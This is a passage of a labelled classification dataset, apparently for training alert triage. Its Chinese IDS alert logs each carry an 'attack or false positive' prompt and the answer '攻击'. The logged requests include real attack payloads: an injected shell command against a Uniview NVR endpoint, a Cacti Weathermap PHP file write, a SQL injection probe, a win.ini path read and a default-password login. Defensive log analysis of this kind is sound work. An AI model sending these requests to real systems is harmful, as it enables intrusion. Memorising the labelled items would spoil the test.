"update_time": "1732688150", "code_language": "", "public_date": "2023-03-17 16:16:08", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "31", "h_proto_version": "HTTP/1.1", "uri": "/server/index.php?s=/api/user/login", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020679", "s": "/api/user/login", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现明文口令传输", "attack_type": "其他", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "建议在网络中传输密码时先进行加密,防止攻击者窃取密码。", "hit_start": "11", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvc2VydmVyL2luZGV4LnBocD9zPS9hcGkvdXNlci9sb2dpbiBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkNvbnRlbnQtTGVuZ3RoOiAzMg0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "dXNlcm5hbWU9c2hvd2RvYyZwYXNzd29yZD0xMjM0NTY=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_32a0fc2ca914efe71ce828f09badee3f", "access_time": "2024-11-27 14:16:09", "content-length": "32", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "161F0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/server/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /server/index.php?s=/api/user/login HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 32\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "username=showdoc&password=123456", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568185-发现明文口令传输", "rule_labels": "{\"0x100b01\": {\"parent_id\": \"0x100b00\", \"type\": \"协议类型\", \"name\": \"HTTP\", \"parent_name\": \"明文口令\", \"username\": \"showdoc\", \"password\": \"123456\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12514", "h_url": "/server/index.php?s=/api/user/login", "username": "showdoc"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688169", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688169, "vuln_harm": "攻击者可利用该漏洞获取数据库敏感信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 76, "uri": "/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31", "dport": 30001, "vuln_name": "宏景eHR SQL注入漏洞(CNVD-2023-08743)", "rsp_status": 0, "code_language": "", "solution": "厂商已提供漏洞修复方案,请关注厂商主页更新:\r\nhttp://hjsoft.com.cn/", "hit_start": 56, "detail_info": "北京宏景世纪软件股份有限公司是国内专业的e-HR专业厂商。\r\n北京宏景世纪软件股份有限公司人力资源信息管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "北京宏景世纪软件股份有限公司是国内专业的e-HR专业厂商。\r\n北京宏景世纪软件股份有限公司人力资源信息管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。", "public_date": "2023-05-12 15:50:49", "sport": 12515}, "detail_info": "北京宏景世纪软件股份有限公司是国内专业的e-HR专业厂商。\r\n北京宏景世纪软件股份有限公司人力资源信息管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/servlet/codesettree", "first_access_time": "2024-11-27 14:16:09", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "宏景eHR SQL注入漏洞(CNVD-2023-08743)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "5a6371e34bb404b65dca06b260b83de4", "xff": "", "vuln_desc": "北京宏景世纪软件股份有限公司是国内专业的e-HR专业厂商。\r\n北京宏景世纪软件股份有限公司人力资源信息管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。", "attack_chain": "0x02010000", "status": "1", "flag": "c", "vuln_harm": "攻击者可利用该漏洞获取数据库敏感信息。", "parentid": "-1", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688148", "code_language": "", "categories": "~31", "public_date": "2023-05-12 15:50:49", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "76", "h_proto_version": "HTTP/1.1", "uri": "/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021625", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "宏景eHR SQL注入漏洞(CNVD-2023-08743)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "厂商已提供漏洞修复方案,请关注厂商主页更新:\r\nhttp://hjsoft.com.cn/", "hit_start": "56", "skyeye_id": "", "payload": {"req_header": "R0VUIC9zZXJ2bGV0L2NvZGVzZXR0cmVlP2ZsYWc9YyZzdGF0dXM9MSZjb2Rlc2V0aWQ9MSZwYXJlbnRpZD0tMSZjYXRlZ29yaWVzPX4zMSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_10d100220e077e524b0faa64459d661a", "access_time": "2024-11-27 14:16:09", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "codesetid": "1", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/servlet/codesettree", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572197-宏景eHR SQL注入漏洞(CNVD-2023-08743)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12515", "h_url": "/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688168", "vlan_id": "", "vuln_type": "浙江宇视科技网络视频录像机远程命令执行漏洞", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.68.194", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732688168, "vuln_harm": "浙江宇视科技 网络视频录像机 ISC /Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 69, "uri": "/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo%20lgbdspxcogdxzzhwhxth>xrhab.txt", "dport": 30001, "vuln_name": "浙江宇视科技网络视频录像机远程命令执行漏洞", "rsp_status": 0, "code_language": "", "solution": "请关注厂商信息:https://cn.uniview.com/", "hit_start": 49, "detail_info": "浙江宇视科技 网络视频录像机 ISC LogReport.php 存在远程命令执行漏洞。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "浙江宇视科技 网络视频录像机 ISC LogReport.php 存在远程命令执行漏洞。", "public_date": "2022-09-16 11:17:32", "sport": 12498}, "solution": "请关注厂商信息:https://cn.uniview.com/", "hit_start": "49", "skyeye_id": "", "payload": {"req_header": "R0VUIC9JbnRlcmZhY2UvTG9nUmVwb3J0L0xvZ1JlcG9ydC5waHA/YWN0aW9uPWV4ZWNVcGRhdGUmZmlsZVN0cmluZz14O2VjaG8lMjBsZ2Jkc3B4Y29nZHh6emh3aHh0aD54cmhhYi50eHQgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "浙江宇视科技 网络视频录像机 ISC LogReport.php 存在远程命令执行漏洞。", "file_md5": "cdc62522cc82c5ca6f9dec942317a43b", "host": "218.76.15.56:30001", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.56:30001/Interface/LogReport/LogReport.php", "first_access_time": "2024-11-27 14:16:08", "hazard_level": "8", "accept-language": "en-US,en;q=0.9", "hazard_rating": "危急", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "浙江宇视科技网络视频录像机远程命令执行漏洞", "alarm_sip": "172.23.68.194", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "6e1f3d969a4032133cf5886c16a60c34", "proto": "http", "xff": "", "alarm_id": "20241127_311fb68f74ec992b9542d05a5b829429", "vuln_desc": "浙江宇视科技 网络视频录像机 ISC LogReport.php 存在远程命令执行漏洞。", "attack_chain": "0x02010000", "access_time": "2024-11-27 14:16:08", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16090000", "vuln_harm": "浙江宇视科技 网络视频录像机 ISC /Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令", "dip_addr": "局域网", "dport": "30001", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732688148", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "public_date": "2022-09-16 11:17:32", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "LogReport.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "69", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo%20lgbdspxcogdxzzhwhxth>xrhab.txt", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10021179", "req_header": "GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo%20lgbdspxcogdxzzhwhxth>xrhab.txt HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571001-浙江宇视科技网络视频录像机远程命令执行漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "sport": "12498", "h_url": "/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;echo%20lgbdspxcogdxzzhwhxth>xrhab.txt", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688167", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件上传", "mapname": "jadsgc.php", "_origin": {"write_date": 1732688167, "vuln_harm": "恶意的攻击者可以利用该漏洞写入恶意文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 49, "uri": "/plugins/weathermap/editor.php?plug=0&mapname=jadsgc.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=bca366a164c49af1dfd07130d961f256&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7", "dport": 30001, "vuln_name": "cacti Weathermap 文件写入漏洞", "rsp_status": 0, "code_language": "", "solution": "厂商暂未发布补丁信息,请及时关注厂商信息", "hit_start": 29, "detail_info": "cacti Weathermap 存在文件写入漏洞。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "cacti Weathermap 存在文件写入漏洞。", "public_date": "2024-05-20 16:20:47", "sport": 12507}, "detail_info": "cacti Weathermap 存在文件写入漏洞。", "file_md5": "afccbd8cbd8d9145937327aae9a8681f", "action": "set_map_properties", "rule_key": "webids", "api": "218.76.15.56:30001/plugins/weathermap/{filename}", "first_access_time": "2024-11-27 14:16:07", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "cacti Weathermap 文件写入漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "a9e08f9861a077b90ace796ec8e84079", "xff": "", "vuln_desc": "cacti Weathermap 存在文件写入漏洞。", "attack_chain": "0x02010000", "vuln_harm": "恶意的攻击者可以利用该漏洞写入恶意文件。", "node_iconfilename": "--NONE--", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688147", "code_language": "", "public_date": "2024-05-20 16:20:47", "skyeye_serial_num": "QbJK/8ze/", "map_legend": "Traffic+Load", "site_app": "", "map_title": "bca366a164c49af1dfd07130d961f256", "super_attack_chain": "0x02000000", "hit_end": "49", "h_proto_version": "HTTP/1.1", "uri": "/plugins/weathermap/editor.php?plug=0&mapname=jadsgc.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=bca366a164c49af1dfd07130d961f256&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021b36", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "cacti Weathermap 文件写入漏洞", "attack_type": "文件上传", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "厂商暂未发布补丁信息,请及时关注厂商信息", "hit_start": "29", "skyeye_id": "", "payload": {"req_header": "R0VUIC9wbHVnaW5zL3dlYXRoZXJtYXAvZWRpdG9yLnBocD9wbHVnPTAmbWFwbmFtZT1qYWRzZ2MucGhwJmFjdGlvbj1zZXRfbWFwX3Byb3BlcnRpZXMmcGFyYW09JnBhcmFtMj0mZGVidWc9ZXhpc3Rpbmcmbm9kZV9uYW1lPSZub2RlX3g9Jm5vZGVfeT0mbm9kZV9uZXdfbmFtZT0mbm9kZV9sYWJlbD0mbm9kZV9pbmZvdXJsPSZub2RlX2hvdmVyPSZub2RlX2ljb25maWxlbmFtZT0tLU5PTkUtLSZsaW5rX25hbWU9JmxpbmtfYmFuZHdpZHRoX2luPSZsaW5rX2JhbmR3aWR0aF9vdXQ9JmxpbmtfdGFyZ2V0PSZsaW5rX3dpZHRoPSZsaW5rX2luZm91cmw9JmxpbmtfaG92ZXI9Jm1hcF90aXRsZT1iY2EzNjZhMTY0YzQ5YWYxZGZkMDcxMzBkOTYxZjI1NiZtYXBfbGVnZW5kPVRyYWZmaWMrTG9hZCZtYXBfc3RhbXA9Q3JlYXRlZCUzQSUyQiUyNWIlMkIlMjVkJTJCJTI1WSUyQiUyNUglM0ElMjVNJTNBJTI1UyZtYXBfbGlua2RlZmF1bHR3aWR0aD03IEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "plug": "0", "alarm_id": "20241127_6fc47e92482cd8a9a404cb9ebf527b96", "access_time": "2024-11-27 14:16:07", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16110000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "map_linkdefaultwidth": "7", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/plugins/weathermap/editor.php", "src_mac": "00:94:a1:5e:6e:87", "debug": "existing", "file_name": "editor.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /plugins/weathermap/editor.php?plug=0&mapname=jadsgc.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=bca366a164c49af1dfd07130d961f256&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "map_stamp": "Created:+%b+%d+%Y+%H:%M:%S", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268573494-cacti Weathermap 文件写入漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12507", "h_url": "/plugins/weathermap/editor.php?plug=0&mapname=jadsgc.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=bca366a164c49af1dfd07130d961f256&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688167", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "文件读取", "_origin": {"write_date": 1732688167, "vuln_harm": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 41, "uri": "/base_import/static/c:/windows/win.ini", "dport": 30001, "vuln_name": "发现读取Windows敏感文件行为", "rsp_status": 0, "code_language": "", "solution": "如果读取成功,请修复文件读取漏洞,设置文件读取权限。", "hit_start": 21, "detail_info": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "public_date": "2023-07-31 16:36:47", "sport": 12495}, "detail_info": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "file_md5": "f4149b219662d69ed2cf8cb4d1dec4cd", "rule_key": "webids", "api": "218.76.15.56:30001/base_import/static/c:/windows/win.ini", "first_access_time": "2024-11-27 14:16:07", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现读取Windows敏感文件行为", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "cce3862abe9c812d19e96353a46d9a33", "xff": "", "vuln_desc": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "attack_chain": "0x02020000", "vuln_harm": "发现读取Windows敏感文件,攻击者尝试利用文件包含漏洞读取Windows主机web服务器的敏感文件。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688147", "code_language": "", "public_date": "2023-07-31 16:36:47", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "41", "h_proto_version": "HTTP/1.1", "uri": "/base_import/static/c:/windows/win.ini", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002171a", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现读取Windows敏感文件行为", "attack_type": "文件读取", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如果读取成功,请修复文件读取漏洞,设置文件读取权限。", "hit_start": "21", "skyeye_id": "", "payload": {"req_header": "R0VUIC9iYXNlX2ltcG9ydC9zdGF0aWMvYzovd2luZG93cy93aW4uaW5pIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkRudDogMQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_d3f1c1f12f031852fdf8294395e40e15", "access_time": "2024-11-27 14:16:07", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16100000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/base_import/static/c:/windows/win.ini", "src_mac": "00:94:a1:5e:6e:87", "file_name": "win.ini", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /base_import/static/c:/windows/win.ini HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572442-发现读取Windows敏感文件行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": 